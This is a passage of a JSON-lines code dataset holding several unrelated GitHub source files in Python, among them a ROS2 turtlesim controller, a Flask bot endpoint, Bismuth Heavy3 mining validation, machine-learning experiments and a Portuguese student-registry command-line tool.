{pub_msg}\")\n if self.state == 'rotate':\n if self.result_response == 0 and not self.action_working:\n self.send_goal(degree)\n self.action_working = True\n if abs(self.result_response) > 0:\n self.result_response = 0\n self.action_working = False\n self.state = 'forward'\n \n\n def pose_listener(self, msg):\n self.x = msg.x\n self.y = msg.y\n self.theta = msg.theta\n \n\n\ndef main():\n rclpy.init()\n turtlesim_controller = TurtlesimController()\n rclpy.spin(turtlesim_controller)\n turtlesim_controller.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()","repo_name":"majiddrn/My-ROS2-Projects","sub_path":"src/turtlesim_controller/turtlesim_controller/turtlesim_controller.py","file_name":"turtlesim_controller.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"74047264719","text":"import time\n\nfrom board import Board\nfrom coord import Coord\nfrom piece_bag import PieceBag\nfrom screenable import Screenable\n\n\nclass Game:\n def __init__(self, screen: Screenable):\n self.board = Board(screen)\n self.bag = PieceBag()\n self.loop = True\n self.piece = self.bag.next()\n self.next_piece = self.bag.next()\n\n def start(self):\n while self.loop:\n 
print(self.bag.next().shapes_coords)\n shape = self.bag.next()\n coords = shape.shapes_coords[shape.shapes_index]\n self.board.paint_coords(coords=coords, initCoord=Coord(0, -2), color=\"#FF0000\")\n self.board.send()\n time.sleep(1)\n\n def draw_skeleton(self):\n self.board.paint_square(Coord(0, 0), Coord(9, 19), \"#\")\n self.board.paint_square(Coord(11, 6), Coord(14, 9), \"#\")\n\n def draw_next_piece(self):\n pass\n\n def stop(self):\n self.loop = False\n\n","repo_name":"ArturAlcoverro/tetris-python","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19425259978","text":"from functools import lru_cache\n\nimport flask\n\nfrom bot import Bot\n\napp = flask.Flask(__name__)\n\n\n@lru_cache(maxsize=3)\ndef fetch_bot(bot: str):\n return Bot.fetch(bot)\n\n\n@app.route('/clear', methods=['POST'])\ndef clear():\n fetch_bot.cache_clear()\n return 'The cache is cleared.'\n\n\n@app.route('//predict', methods=['POST'])\ndef predict(bot: str):\n try:\n utterance = flask.request.form['utterance']\n app.logger.debug('utterance: ' + utterance)\n if not utterance or len(utterance) == 0:\n raise AttributeError('There is no utterance.')\n\n bot = fetch_bot(bot)\n if not bot.is_trained():\n result = bot.train()\n app.logger.debug(result)\n\n result = bot.predict(utterance)\n return flask.json.jsonify(result)\n except AttributeError as e:\n return flask.make_response(str(e), 404)\n except Exception as e:\n return flask.make_response(str(e), 500)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"fin10/bot_nlu","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"9979564382","text":"import os\nimport sys\nimport numpy as np\n\nfrom keras.models import model_from_json\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimport tensorflow as tf\nimport keras\n\ndef load_model(_dir, prefix='model'):\n desc_file = os.path.join(_dir, \"{}_{}.json\".format(prefix, \"spec\"))\n weights_file = os.path.join(_dir, \"{}_{}.h5\".format(prefix, \"weights\"))\n\n model = None\n with open(desc_file, \"r\") as spec_file:\n model = model_from_json(spec_file.read())\n model.load_weights(weights_file)\n return model\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: run_model.py model_dir model_prefix image_path\")\n sys.exit(1)\n model_dir = sys.argv[1]\n model_prefix = sys.argv[2]\n model = load_model(model_dir, model_prefix)\n model.compile('adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n image_path = sys.argv[3]\n img = image.load_img(image_path, target_size=(64, 64, 3))\n img_array = image.img_to_array(img)\n img_batch = np.expand_dims(img, axis=0)\n\n prediction = model.predict(img_batch / 255)\n print(prediction)\n","repo_name":"spy16/cats-and-dogs","sub_path":"run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"31702753625","text":"import gym\nfrom torchvision import transforms\nfrom datasets import ChannelFirst, FrameStack\nimport argparse\nimport torch\nimport numpy as np\nimport os\nfrom models import Model1, Model2\n\nparser = argparse.ArgumentParser(\n description=\"\"\" python test_stack.py 
--name | -n [model1 | model2] --max_steps | -s [num (def 20000)] --ckpt | -c [str]\"\"\")\nparser.add_argument('--name', '-n', type=str, required=True,\n help='Name of the model to be tested')\nparser.add_argument('--max_steps', '-s', type=int,\n default=20000, help='Max Steps in the simulation')\nparser.add_argument('--ckpt', '-c', type=str,\n default=None, help='Checkpoint Name', required=True)\n\n\ndef play(model, max_steps):\n\n env = gym.make('BreakoutNoFrameskip-v4')\n env = gym.wrappers.Monitor(\n env, video_dir, force=True, video_callable=lambda _: True)\n s = preprocess(np.array(env.reset())).type(\n torch.FloatTensor).to(device)\n a = 1\n for i in range(max_steps):\n if i % 100 == 0:\n a = 1\n else:\n out = model(s)\n a = torch.argmax(out, axis=1).to(device_cpu).item()\n if a == 1 or a == 2:\n a += 1\n ns, _, done, _ = env.step(a)\n ns = preprocess(np.array(ns)).type(\n torch.FloatTensor).to(device)\n s = ns\n\n if done:\n break\n else:\n env.stats_recorder.save_complete()\n env.stats_recorder.done = True\n\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n model_name = args.name\n assert model_name in ['model1', 'model2']\n ckpt = args.ckpt\n max_steps = args.max_steps\n\n ckpt_path = './saved/' + model_name + '/' + ckpt + '.pt'\n video_dir = './agent/' + model_name + '/'\n\n device_cpu = torch.device('cpu')\n if torch.cuda.is_available():\n device = torch.device('cuda')\n\n else:\n device = device_cpu\n\n if model_name == 'model1':\n model = Model1().to(device)\n else:\n model = Model2().to(device)\n\n if os.path.exists(ckpt_path):\n with open(ckpt_path, 'rb') as f:\n saved_dict = torch.load(f)\n\n model.load_state_dict(saved_dict['model'])\n model.eval()\n\n else:\n raise ValueError('Checkpoint does not exists')\n\n preprocess = transforms.Compose([\n ChannelFirst(),\n transforms.Resize((84, 84)),\n transforms.Grayscale(),\n FrameStack(4)\n ])\n\n print('Starting test run')\n\n play(model, max_steps)\n\n video_id = 0\n for f in os.listdir(video_dir):\n\n if f.startswith('test') and f.endswith('.mp4'):\n video_id = max(video_id, int(f.replace('.mp4', '').split('_')[1]))\n\n video_id += 1\n\n for f in os.listdir(video_dir):\n if f.startswith('open') and f.endswith('.mp4'):\n os.rename(video_dir + f, video_dir +\n 'test_' + str(video_id) + '.mp4')\n elif f.startswith('open') and f.endswith('.meta.json'):\n os.rename(video_dir + f, video_dir +\n 'test_' + str(video_id) + '.meta.json')\n\n print('Completed')\n","repo_name":"Sykarius/PRL-Project","sub_path":"test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25468393399","text":"\"\"\"\nModularize the mining algo check\n\nBismuth Heavy3\n\nFrom bismuth node\n\"\"\"\n\nimport mmap\nimport os\nimport struct\nimport sys\nfrom hashlib import sha224\nfrom hmac_drbg import DRBG\nfrom quantizer import quantize_two, quantize_eight, quantize_ten\nfrom decimal import Decimal\n\nimport regnet\n\nfrom fork import Fork\nfork = Fork()\n\n__version__ = '0.1.4'\n\n\nprint(\"Mining_Heavy3 v{}\".format(__version__))\n\nRND_LEN = 0\n\nMMAP = None\nF = None\n\nis_regnet = False\nheavy = True\n\n\ndef read_int_from_map(map, index):\n return struct.unpack('I', map[4 * index:4 * index + 4])[0]\n\n\ndef anneal3(mmap, n):\n \"\"\"\n Converts 224 bits number into annealed version, hexstring\n\n :param n: a 224 = 7x32 bits\n :return: 56 char in hex encoding.\n \"\"\"\n h7 = n & 0xffffffff\n n = n >> 32\n 
index = ((h7 & ~0x7) % RND_LEN) * 4\n # f1 = struct.unpack('I', mmap[index:index + 4])[0]\n value = h7 ^ struct.unpack('I', mmap[index:index + 4])[0]\n res = \"{:08x}\".format(value)\n for i in range(6):\n index += 4\n h = n & 0xffffffff\n n = n >> 32\n value = h ^ struct.unpack('I', mmap[index:index + 4])[0]\n res = \"{:08x}\".format(value) + res\n return res\n\n\ndef anneal3_regnet(mmap, n):\n \"\"\"\n Converts 224 bits number into annealed version, hexstring\n This uses a fake anneal for easier regtests\n\n :param n: a 224 = 7x32 bits\n :return: 56 char in hex encoding.\n \"\"\"\n return \"{:056x}\".format(n)\n\n\ndef bin_convert(string):\n return ''.join(format(ord(x), '8b').replace(' ', '0') for x in string)\n\n\ndef diffme_heavy3(pool_address, nonce, db_block_hash):\n # minimum possible diff\n diff = 1\n diff_result = 0\n hash224 = sha224((pool_address + nonce + db_block_hash).encode(\"utf-8\")).digest()\n hash224 = int.from_bytes(hash224, 'big')\n if heavy or (not is_regnet):\n annealed_sha = anneal3(MMAP, hash224)\n else:\n annealed_sha = anneal3_regnet(MMAP, hash224)\n bin_annealed_sha = bin_convert(annealed_sha)\n mining_condition = bin_convert(db_block_hash)\n while mining_condition[:diff] in bin_annealed_sha:\n diff_result = diff\n diff += 1\n return diff_result\n\n\ndef check_block(block_height_new, miner_address, nonce, db_block_hash, diff0, received_timestamp, q_received_timestamp,\n q_db_timestamp_last, peer_ip='N/A', app_log=None):\n \"\"\"\n Checks that the given block matches the mining algo.\n\n :param block_height_new:\n :param miner_address:\n :param nonce:\n :param db_block_hash:\n :param diff0:\n :param received_timestamp:\n :param q_received_timestamp:\n :param q_db_timestamp_last:\n :param peer_ip:\n :param app_log:\n :return:\n \"\"\"\n try:\n if is_regnet:\n diff0 = regnet.REGNET_DIFF - 8\n\n real_diff = diffme_heavy3(miner_address, nonce, db_block_hash)\n diff_drop_time = Decimal(180)\n mining_condition = bin_convert(db_block_hash)[0:int(diff0)]\n # simplified comparison, no backwards mining\n if real_diff >= int(diff0):\n if app_log:\n app_log.info(\"Difficulty requirement satisfied for block {} from {}. 
{} >= {}\"\n .format(block_height_new, peer_ip, real_diff, int(diff0)))\n diff_save = diff0\n\n elif Decimal(received_timestamp) > q_db_timestamp_last + Decimal(diff_drop_time):\n # uses block timestamp, don't merge with diff() for security reasons\n factor = 1\n time_difference = q_received_timestamp - q_db_timestamp_last\n diff_dropped = quantize_ten(diff0) + quantize_ten(1) - quantize_ten(time_difference / diff_drop_time)\n # Emergency diff drop\n if Decimal(received_timestamp) > q_db_timestamp_last + Decimal(2 * diff_drop_time):\n factor = 10\n diff_dropped = quantize_ten(diff0) - quantize_ten(1) - quantize_ten(factor * (time_difference-2*diff_drop_time) / diff_drop_time)\n\n if diff_dropped < 50:\n diff_dropped = 50\n if real_diff >= int(diff_dropped):\n if app_log:\n app_log.info (\"Readjusted difficulty requirement satisfied for block {} from {}, {} >= {} (factor {})\"\n .format(block_height_new, peer_ip, real_diff, int(diff_dropped), factor))\n diff_save = diff0\n # lie about what diff was matched not to mess up the diff algo\n else:\n raise ValueError (\"Readjusted difficulty too low for block {} from {}, {} should be at least {}\"\n .format(block_height_new, peer_ip, real_diff, diff_dropped))\n else:\n raise ValueError (\"Difficulty {} too low for block {} from {}, should be at least {}\"\n .format(real_diff, block_height_new, peer_ip, diff0))\n return diff_save\n except Exception as e:\n # Left for edge cases debug\n print(\"MH3 check block\", e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n raise\n\n\ndef create_heavy3a(file_name=\"heavy3a.bin\"):\n if (not heavy) and is_regnet:\n print(\"Regnet, no heavy file\")\n return\n print(\"Creating Junction Noise file, this usually takes a few minutes...\")\n gen = DRBG(b\"Bismuth is a chemical element with symbol Bi and atomic number 83. 
It is a pentavalent post-transition metal and one of the pnictogens with chemical properties resembling its lighter homologs arsenic and antimony.\")\n # Size in Gb - No more than 4Gb from a single seed\n GB = 1\n # Do not change chunk size, it would change the file content.\n CHUNK_SIZE = 1024*4 # time 3m20.990s\n COUNT = GB * 1024 * 1024 * 1024 // CHUNK_SIZE\n with open(file_name, 'wb') as f:\n for chunks in range(COUNT):\n f.write(gen.generate(CHUNK_SIZE))\n\n\ndef mining_open(file_name=\"heavy3a.bin\"):\n \"\"\"\n Opens the Junction MMapped file\n \"\"\"\n if (not heavy) and is_regnet:\n print(\"Regnet, no heavy file to open\")\n return\n global F\n global MMAP\n global RND_LEN\n if os.path.isfile(file_name):\n size = os.path.getsize(file_name)\n if size != 1073741824:\n print(\"Invalid size of heavy file {}.\".format(file_name))\n try:\n os.remove(file_name)\n print(\"Deleted, Will be re-created\")\n except Exception as e:\n print(e)\n sys.exit()\n if not os.path.isfile(file_name):\n create_heavy3a(file_name)\n try:\n F = open(file_name, \"rb+\")\n # memory-map the file, size 0 means whole file\n MMAP = mmap.mmap(F.fileno(), 0)\n RND_LEN = os.path.getsize(file_name) // 4\n if read_int_from_map(MMAP, 0) != 3786993664:\n raise ValueError(\"Wrong file: {}\".format(file_name))\n if read_int_from_map(MMAP, 1024) != 1742706086:\n raise ValueError(\"Wrong file: {}\".format(file_name))\n except Exception as e:\n print(\"Error while loading Junction file: {}\".format(e))\n sys.exit()\n\n\ndef mining_close():\n \"\"\"\n Close the MMAP access, HAS to be called at end of program.\n \"\"\"\n if (not heavy) and is_regnet:\n print(\"Regnet, no heavy file to close\")\n return\n global F\n global MMAP\n try:\n assert MMAP\n MMAP.close()\n except:\n pass\n\n try:\n assert F\n F.close()\n except:\n pass\n","repo_name":"bismuthfoundation/Bismuth","sub_path":"mining_heavy3.py","file_name":"mining_heavy3.py","file_ext":"py","file_size_in_byte":7572,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"29"} +{"seq_id":"4839687234","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport helper_functions as hf\nimport os\nimport IPython\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n## User-defined parameters\nn_ = 784 # Num_pixels\nm_ = 400 # Num_elements\nlamb_ = 0.50 # Threshold potential (sparseness penalty scaling)\ndt_ = 0.001 # [s] discrete time constant\ntau_ = 0.01 # [s] LCA time constant\nlr_ = 0.05 # Learning rate for weight updates (will be divided by batch_)\nbatch_ = 100 # Number of images in a batch\nnum_steps_ = 20 # Number of steps to run LCA\nnum_trials_ = 30000 # Number of batches to learn weights\ndisplay_ = 100 # How often to display status updates\n\ntf.set_random_seed(1234567890)\nnp.random.seed(1234567890)\n\n## Setup data\ndataset = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n## Setup constants & placeholders\ns = tf.placeholder(tf.float32, shape=[n_, None], name=\"input\") # Placeholder for data\neta = tf.placeholder(tf.float32, shape=(), name=\"lca_update\") # Placeholder for LCA update rate\nweight_lr = tf.placeholder(tf.float32, shape=(), name=\"weight_lr\") # Placeholder for Phi update rule\n\n## Initialize membrane potential\nu = tf.Variable(np.zeros([m_, batch_], dtype=np.float32), trainable=False, name=\"membrane_potential\")\na = tf.select(tf.greater(u, lamb_), u-lamb_, tf.zeros(shape=tf.shape(u)), name=\"thresholded_u\")\n\n## Initialize dictionary\nphi = 
tf.Variable(tf.nn.l2_normalize(tf.truncated_normal([n_, m_], mean=0.0,\n stddev=1.0, dtype=tf.float32, name=\"phi_init\"), dim=1, name=\"row_l2_norm\"), name=\"phi\")\n\n## Reconstruction variable\ns_ = tf.matmul(phi, a, name=\"reconstruction\")\n\n## Loss functions\neuclidean_loss = 0.5 * tf.reduce_sum(tf.pow(tf.sub(s, s_), 2.0))\nsparse_loss = lamb_ * tf.reduce_sum(tf.abs(a))\nunsupervised_loss = euclidean_loss + sparse_loss\n\n## Discritized membrane update rule\ndu = tf.sub(tf.sub(tf.matmul(tf.transpose(phi), s),\n tf.matmul(tf.matmul(tf.transpose(phi), phi)\n - tf.constant(np.identity(int(phi.get_shape()[1]), dtype=np.float32), name=\"identity_matrix\"), a)), u)\n\nstep_lca = tf.group(u.assign_add(eta * du))\n\n## Discritized weight update rule\nphi_optimizer = tf.train.GradientDescentOptimizer(weight_lr, name=\"grad_optimizer\")\nauto_gradient = phi_optimizer.compute_gradients(unsupervised_loss, var_list=[phi])\n\nmanual_gradient = -tf.matmul(tf.sub(s, s_), tf.transpose(a))\n\n#step_phi = phi_optimizer.apply_gradients([(manual_gradient, phi)])\nstep_phi = phi_optimizer.apply_gradients(auto_gradient)\n\n## Weight normalization\nnormalize_phi = tf.group(phi.assign(tf.nn.l2_normalize(phi, dim=1,\n epsilon=1e-12, name=\"row_l2_norm\")), name=\"do_normalization\")\n\npSNRdB = tf.mul(10.0, tf.log(255.0**2\n / ((1.0 / float(n_)) * tf.reduce_sum(tf.pow(tf.sub(s, s_), 2.0)))),\n name=\"recon_quality\")\n\nwith tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for trial in range(num_trials_):\n norm_input = hf.normalize_image(dataset.train.next_batch(batch_)[0]).T # don't need labels\n for t in range(num_steps_):\n step_lca.run({s:norm_input, eta:dt_/tau_})\n step_phi.run({s:norm_input, weight_lr:float(lr_)/float(batch_)})\n normalize_phi.run()\n if trial % display_ == 0:\n sparsity = 100*np.count_nonzero(a.eval())/np.float32(np.size(a.eval()))\n print(\"Finished trial %g\"%(trial))\n print(\"\\tmax val of u:\\t%g\"%(u.eval().max()))\n print(\"\\tpercent active:\\t%g\"%(sparsity))\n print(\"\\tRecon pSNRdB:\\t%g\"%(pSNRdB.eval({s:norm_input})))\n print(\"\\teuclidean loss:\\t%g\"%(euclidean_loss.eval({s:norm_input, u:u.eval(), phi:phi.eval()})))\n print(\"\\tsparse loss:\\t%g\"%(sparse_loss.eval({u:u.eval()})))\n print(\"\\ttotal loss:\\t%g\"%(unsupervised_loss.eval({s:norm_input, u:u.eval(), phi:phi.eval()})))\n _ = hf.save_data_tiled(tf.transpose(phi).eval().reshape(m_, int(np.sqrt(n_)), int(np.sqrt(n_))),\n title='Dictionary for trial number '+str(trial),\n save_filename=\"outputs/phi_\"+str(trial)+\".pdf\")\n #IPython.embed()\n _ = hf.save_data_tiled(tf.transpose(auto_gradient[0][0]).eval({s:norm_input, weight_lr:float(lr_)/float(batch_)}).reshape(m_, int(np.sqrt(n_)), int(np.sqrt(n_))),\n title='TF computed phi gradient for trial number '+str(trial),\n save_filename=\"outputs/dphi_auto_\"+str(trial)+\".pdf\")\n _ = hf.save_data_tiled(tf.transpose(manual_gradient).eval({s:norm_input, weight_lr:float(lr_)/float(batch_)}).reshape(m_, int(np.sqrt(n_)), int(np.sqrt(n_))),\n title='Manually computed phi gradient for trial number '+str(trial),\n save_filename=\"outputs/dphi_manual_\"+str(trial)+\".pdf\")\n\n IPython.embed()\n","repo_name":"dpaiton/EntropyCoding","sub_path":"python/tensorFlow/lca_test.py","file_name":"lca_test.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} 
+{"seq_id":"17460239184","text":"\"\"\"\ndata_preprocess.views.serializers.CleanDataAssetGetSerializer.py\n================================================================\nMódulo para la definición del serializador del modelo de datos\ndel activo de datos limpio\n\"\"\"\n\nfrom rest_framework import serializers\nfrom data_preprocess.models.storage.CleanDataAsset import CleanDataAsset\n\n\nclass CleanDataAssetGetSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = CleanDataAsset\n fields = ('code', 'context', 'registry_date',\n 'updated_on', 'data_mining_task', 'input_variables',\n 'response_variable', 'number_of_classes',\n 'clean_data')\n","repo_name":"ronaldraxon/dauruxu","sub_path":"aplicacion/dauruxu/data_preprocess/views/serializers/CleanDataAssetGetSerializer.py","file_name":"CleanDataAssetGetSerializer.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24145346412","text":"import config, utils, files, console\n\nstudents = {}\n\n\ndef storeRemoved(name, email, reason):\n with open(\"txtSrc/deleted.txt\", mode=\"a\", encoding=\"utf-8\") as file:\n file.write(f\"Nome: {name}\\nE-mail: {email}\\nMotivo: {reason}\\n\")\n\n\ndef clearRemoved():\n with open(\"txtSrc/deleted.txt\", mode=\"w\", encoding=\"utf-8\") as file:\n file.write(\"\")\n\n\ndef printRemoved():\n files.printFile(\"deleted\")\n\n\ndef showHelp():\n files.printFile(\"help\")\n\n\ndef findKeyByValue(value):\n global students\n\n if value not in students.values():\n return None\n else:\n return list(students.keys())[list(students.values()).index(value)]\n\n\ndef printStudent(name):\n global students\n\n print(f\"Nome: {name}\\nE-mail: {students[name]}\")\n\n\ndef showSortedByRegister():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n else:\n print(\"Lista de alunos (ordenada por cadastro):\")\n for name in students.values():\n printStudent(findKeyByValue(name))\n\n\ndef showSortedByName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n else:\n print(\"Lista de alunos (ordenada alfabeticamente por Nome):\")\n for name in sorted(students.keys()):\n printStudent(name)\n\n\ndef showSortedByEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n else:\n print(\"Lista de alunos (ordenada alfabeticamente por E-mail):\")\n for email in sorted(students.values()):\n printStudent(findKeyByValue(email))\n\n\ndef searchByName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n name = input(\"Nome do aluno: \")\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n printStudent(name)\n\n\ndef searchByEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n email = input(\"E-mail do aluno: \").strip().lower()\n if email not in students.values():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n printStudent(findKeyByValue(email))\n\n\ndef registerStudent():\n global students\n\n registerAmount = 0\n try:\n registerAmount = int(input(\"Digite quantos alunos, deseja cadastrar: \"))\n except ValueError:\n print(\"\\n[Error] Opção inválida, por favor tente novamente mais tarde.\")\n return \n \n for _i in range(registerAmount):\n name = input(\"Digite o nome completo do aluno: \").strip().title()\n email = input(\"Digite o e-mail 
do aluno: \").strip().lower()\n\n if utils.isEmpty(name) or utils.isEmpty(email):\n print(\"[Erro] Não cadastramos informações em branco.\")\n else:\n students.update({name: email})\n\n\ndef removeByName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n name = input(\"Nome do aluno a ser removido: \").strip().title()\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n reason = input(\"Motivo da exclusão: \")\n storeRemoved(name, students[name], reason)\n del students[name]\n\n\ndef removeByEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n email = input(\"E-mail do aluno a ser removido: \").strip().lower()\n name = findKeyByValue(email)\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n reason = input(\"Motivo da exclusão: \")\n storeRemoved(name, students[name], reason)\n del students[name]\n\n\ndef updateName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n name = input(\"Nome do aluno a ser atualizado: \").strip().title()\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n newName = input(\"Novo nome: \").strip().title()\n students[newName] = students[name]\n del students[name]\n\n\ndef updateEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n email = input(\"E-mail do aluno a ser atualizado: \").strip().lower()\n if email not in students.values():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n newEmail = input(\"Novo e-mail: \").strip().lower()\n students[findKeyByValue(email)] = newEmail\n\n\ndef updateUsername():\n newUsername = input(\"Digite o novo login do administrador: \")\n files.inputFile(\"login\", newUsername)\n\n\ndef updatePassword():\n print(\"Obs: A senha precisa ter entre 4 á 8 digitos\\n\")\n newPassword = input(\"Digite a nova senha do administrador: \")\n if len(newPassword) >= 4 and len(newPassword) <= 8:\n files.inputFile(\"senha\", config.encrypt(newPassword))\n console.animated(\"Criptografando senha\")\n else:\n print(\"[Erro] Não foi possivel cadastrar essa senha\")\n\n\ndef restoreLogin():\n files.inputFile(\"login\", config.defaultLogin)\n files.inputFile(\"senha\", config.encrypt(config.defaultPassword))\n console.animated(\"Restaurando\")\n print(\"Login de administrador restaurado\")\n\n\ndef stopExecution():\n exit()\n\n\nCOMMANDS = {\n \"help\": showHelp,\n \"register\": registerStudent,\n \"list/r\": showSortedByRegister,\n \"list/n\": showSortedByName,\n \"list/e\": showSortedByEmail,\n \"list/b\": printRemoved,\n \"clearbin\": clearRemoved,\n \"search/n\": searchByName,\n \"search/e\": searchByEmail,\n \"remove/n\": removeByName,\n \"remove/e\": removeByEmail,\n \"restore/a\": restoreLogin,\n \"update/n\": updateName,\n \"update/e\": updateEmail,\n \"update/l\": updateUsername,\n \"update/p\": updatePassword,\n \"end\": stopExecution,\n}\n\nCOMMAND_LIST = COMMANDS.keys()\n\n\ndef queryCommand():\n print(\"Digite \\\"help\\\" para ver o menu de opções\")\n chosenCommand = input(\"\\n> \").strip().lower()\n if chosenCommand not in COMMAND_LIST:\n print(\"[Erro] Comando não encontrado.\")\n else:\n print()\n COMMANDS[chosenCommand]()\n print()\n\n\ndef main():\n console.clearScreen()\n config.loginAdm()\n console.clearScreen()\n while True:\n queryCommand()\n\n\nif __name__ == \"__main__\":\n 
main()\n \n \n","repo_name":"rntsilv/Project-University---Anhembi-Morumbi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39753552403","text":"#!/usr/bin/python3\n\nfh = open(\"input.txt\", mode='r')\nintxt = fh.read()\nfh.close()\n\ndl = intxt.strip().split(\"\\n\")\n\nx, y, f = 0, 0, 0\n\ndt = { 0: 'E', 90: 'S', 180: 'W', 270: 'N' }\n\ndef getdir(f, oa):\n f += oa\n \n if f > 270: \n f -= 360\n elif f < 0:\n f += 360\n\n return f\n \n\nfor i in dl:\n oc = i[0]\n oa = int(i[1:])\n \n if oc == \"R\": f = getdir(f, oa)\n if oc == \"L\": f = getdir(f, oa * -1)\n \n if oc == \"F\": oc = dt.get(f)\n if oc == \"N\": y += oa\n if oc == \"S\": y -= oa\n if oc == \"E\": x += oa\n if oc == \"W\": x -= oa\n \nprint(x, y, abs(x) + abs(y))","repo_name":"aaftre/AdventofCode","sub_path":"2020/Day12/Part1/Day12a.py","file_name":"Day12a.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20087449297","text":"\"\"\"\nhere we are going to run everything\n\"\"\"\n\nimport prepare_data, models, visualisations\n\n# prepare our data to train\nX, y = prepare_data.prepare_data()\n\n# let's see result for the easiest model - just simple linear regression\nlinear_regression_R2, linear_regression_MSE = models.count_linear_regression(X, y)\nprint('linear_regression_R2: ' , linear_regression_R2, ' linear_regression_MSE: ', linear_regression_MSE)\n\n# let's check our regression with gradient boosting, first search for best parameters and that train our model on it\ngbr_R2, gbr_MSE = models.train_best_gb_regression(X,y)\nprint('best_gb_regression_R2 : ', gbr_R2, ' best_gb_regression_MSE : ', gbr_MSE)\n\n# let's check our regression with gradient boosting, first search for best parameters and that train our model on it\nxgb_R2, xgb_MSE = models.train_best_extreme_gb(X, y)\nprint('best_XGBoost_R2 : ', xgb_R2, ' best_XGBoost_MSE : ', xgb_MSE)\n\n\n# ok, now we can compare our models and visualize their scores\nR2_scores = [linear_regression_R2, gbr_R2, xgb_R2]\nMSE_scores = [abs(linear_regression_MSE), abs(gbr_MSE), abs(xgb_MSE)]\nmodels_to_compare = ['linear_regression', 'Best GBRegressor', 'xgboost']\n\nprint('R2_scores: ', R2_scores)\nprint('MSE_scores: ', MSE_scores)\n\nvisualisations.plot_score(models_to_compare, R2_scores,'R2')\nvisualisations.plot_score(models_to_compare, MSE_scores,'MSE')\n\n# we see that even our best score is not the best -> probably we should come back to the beginning\n# and dive deeper into data, then if it won't help, we may play with different methods and it's parameters\n# however it's not complicated case (just predicting price from numerical data) it might be a need to split\n# the whole dataset on some specific clusters and create different models for each cluster\n","repo_name":"OliwiaW/predict_house_prices","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16932423524","text":"# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful, 
